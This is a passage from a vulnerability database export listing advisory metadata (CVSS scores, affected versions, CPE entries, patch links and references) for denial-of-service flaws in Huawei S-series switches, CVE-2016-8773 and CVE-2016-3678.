                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-97593",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-8773",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2016-8773",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2016-11388",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201611-370",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-97593",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "VULHUB",
            id: "VHN-97593",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei S5300 with software V200R003C00, V200R007C00, V200R008C00, V200R009C00; S5700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R005C03, V200R007C00, V200R008C00, V200R009C00; S6300 with software V200R003C00, V200R005C00, V200R008C00, V200R009C00; S6700 with software V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R008C00, V200R009C00; S7700 with software V200R007C00, V200R008C00, V200R009C00; S9300 with software V200R007C00, V200R008C00, V200R009C00; S9700 with software V200R007C00, V200R008C00, V200R009C00; and S12700 with software V200R007C00, V200R007C01, V200R008C00, V200R009C00 allow the attacker to cause a denial of service condition by sending malformed MPLS packets. Multiple Huawei Product has a service disruption (DoS) There are vulnerabilities that are put into a state.An attacker could create a malformed MPLS Service interruption due to packet transmission (DoS) There is a possibility of being put into a state. Huawei S9700 is the S series switch of China Huawei. A denial of service vulnerability exists in several Huawei products due to the failure of the program to properly verify MultiprotocolLabelSwitching (MPLS) messages. Multiple Huawei products are prone to a remote denial-of-service vulnerability. \nAttackers can exploit this issue to crash the affected device, denying service to legitimate users. The following products and versions are affected: Huawei S9700 V200R009C00 , V200R008C00 , V200R007C00 ; Huawei S9300 V200R009C00 , V200R008C00 , V200R007C00 ; Huawei S7700 V200R009C00 , V200R008C00 , V200R007C00 ; Huawei S6700 V200R009C00 , V200R008C00 , V200R005C00 , V200R003C00 , V200R002C00 , V200R001C01 , V200R001C00 ; Huawei S6300 V200R009C00 , V200R008C00 , V200R005C00 , V200R003C00 ; Huawei S5700 V200R009C00 , V200R008C00 , V200R007C00 , V200R005C00 , V200R003C00 , V200R002C00 , V200R001C00 ; Huawei S5300 V200R009C00 , V200R008C00 , V200R007C00 , V200R003C00 ; Huawei S12700 V200R009C00 , V200R008C00 , V200R007C01 , V200R007C00 ",
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "BID",
            id: "94285",
         },
         {
            db: "VULHUB",
            id: "VHN-97593",
         },
      ],
      trust: 2.52,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2016-8773",
            trust: 3.4,
         },
         {
            db: "BID",
            id: "94285",
            trust: 2.6,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-97593",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "VULHUB",
            id: "VHN-97593",
         },
         {
            db: "BID",
            id: "94285",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   id: "VAR-201704-0502",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "VULHUB",
            id: "VHN-97593",
         },
      ],
      trust: 1.5252524428571426,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
      ],
   },
   last_update_date: "2023-12-18T13:48:39.743000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "huawei-sa-20161111-01-mpls",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
         },
         {
            title: "Patch for Denial of Service Vulnerability (CNVD-2016-11388) for multiple Huawei products",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/84128",
         },
         {
            title: "Multiple Huawei Fixes for product input validation vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=65729",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-20",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-97593",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://www.securityfocus.com/bid/94285",
         },
         {
            trust: 1.7,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20161111-01-mpls-en",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8773",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2016-8773",
         },
         {
            trust: 0.6,
            url: "http://www.huawei.com/cn/psirt/security-advisories/2016/huawei-sa-20161111-01-mpls-cn",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20161111-01-mpls-en",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "VULHUB",
            id: "VHN-97593",
         },
         {
            db: "BID",
            id: "94285",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            db: "VULHUB",
            id: "VHN-97593",
         },
         {
            db: "BID",
            id: "94285",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-11-22T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            date: "2017-04-02T00:00:00",
            db: "VULHUB",
            id: "VHN-97593",
         },
         {
            date: "2016-11-11T00:00:00",
            db: "BID",
            id: "94285",
         },
         {
            date: "2017-05-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            date: "2017-04-02T20:59:01.407000",
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            date: "2016-11-18T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2016-11-22T00:00:00",
            db: "CNVD",
            id: "CNVD-2016-11388",
         },
         {
            date: "2017-04-11T00:00:00",
            db: "VULHUB",
            id: "VHN-97593",
         },
         {
            date: "2016-11-24T01:09:00",
            db: "BID",
            id: "94285",
         },
         {
            date: "2017-05-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
         {
            date: "2017-04-11T01:13:07.097000",
            db: "NVD",
            id: "CVE-2016-8773",
         },
         {
            date: "2016-11-18T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple  Huawei Service disruption in products  (DoS) Vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2016-008266",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "input validation",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201611-370",
         },
      ],
      trust: 0.6,
   },
}

var-201604-0306
Vulnerability from variot

Huawei Quidway S9700, S5700, S5300, S9300, and S7700 switches with software before V200R003SPH012 allow remote attackers to cause a denial of service (switch restart) via crafted traffic. Huawei S9300, S5700, S5300, S9300, and S7700 are all S series switches of Huawei. There are security vulnerabilities in various HuaweiQuidway switches. Multiple Huawei Quidway S-Series Switches are prone to a denial-of-service vulnerability. Huawei Quidway S9700, S5700, S5300, S9300, and S7700 are all S-series switch products of China's Huawei (Huawei). The following products and versions are affected: Huawei Quidway S9700, S5700, S5300, S9300, and S7700 using software versions earlier than V200R003SPH012

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201604-0306",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "quidway s9700",
            scope: null,
            trust: 1.4,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5700",
            scope: null,
            trust: 1.4,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300",
            scope: null,
            trust: 1.4,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s9300",
            scope: null,
            trust: 1.4,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s7700",
            scope: null,
            trust: 1.4,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway",
            scope: "lt",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r003sph012",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:a:huawei:s7700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:a:huawei:s5700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:a:huawei:s9300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:a:huawei:s5300_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:a:huawei:s9700_firmware:v200r003c00spc500:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The vendor reported this issue.",
      sources: [
         {
            db: "BID",
            id: "85731",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2016-3678",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: true,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-3678",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2016-02160",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-92497",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2016-3678",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2016-3678",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2016-02160",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201604-178",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-92497",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "VULHUB",
            id: "VHN-92497",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei Quidway S9700, S5700, S5300, S9300, and S7700 switches with software before V200R003SPH012 allow remote attackers to cause a denial of service (switch restart) via crafted traffic. Huawei S9300, S5700, S5300, S9300, and S7700 are all S series switches of Huawei. There are security vulnerabilities in various HuaweiQuidway switches. Multiple Huawei Quidway S-Series Switches are prone to a denial-of-service vulnerability. Huawei Quidway S9700, S5700, S5300, S9300, and S7700 are all S-series switch products of China's Huawei (Huawei). The following products and versions are affected: Huawei Quidway S9700, S5700, S5300, S9300, and S7700 using software versions earlier than V200R003SPH012",
      sources: [
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "BID",
            id: "85731",
         },
         {
            db: "VULHUB",
            id: "VHN-92497",
         },
      ],
      trust: 2.52,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2016-3678",
            trust: 3.4,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
            trust: 0.6,
         },
         {
            db: "BID",
            id: "85731",
            trust: 0.3,
         },
         {
            db: "VULHUB",
            id: "VHN-92497",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "VULHUB",
            id: "VHN-92497",
         },
         {
            db: "BID",
            id: "85731",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   id: "VAR-201604-0306",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "VULHUB",
            id: "VHN-92497",
         },
      ],
      trust: 1.2715110655555555,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
      ],
   },
   last_update_date: "2023-12-18T13:44:13.822000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "huawei-sa-20160330-01-switch",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
         },
         {
            title: "Patches for multiple HuaweiQuidway switch denial of service vulnerabilities",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/73980",
         },
         {
            title: "Multiple Huawei Quidway Repair measures for switch denial of service vulnerability",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60879",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201604-178",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-20",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-92497",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.6,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160330-01-switch-en",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3678",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3678",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2016-02160",
         },
         {
            db: "VULHUB",
            id: "VHN-92497",
         },
         {
            db: "BID",
            id: "85731",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2016-002072",
         },
         {
            db: "NVD",
            id: "CVE-2016-3678",
         },
         {
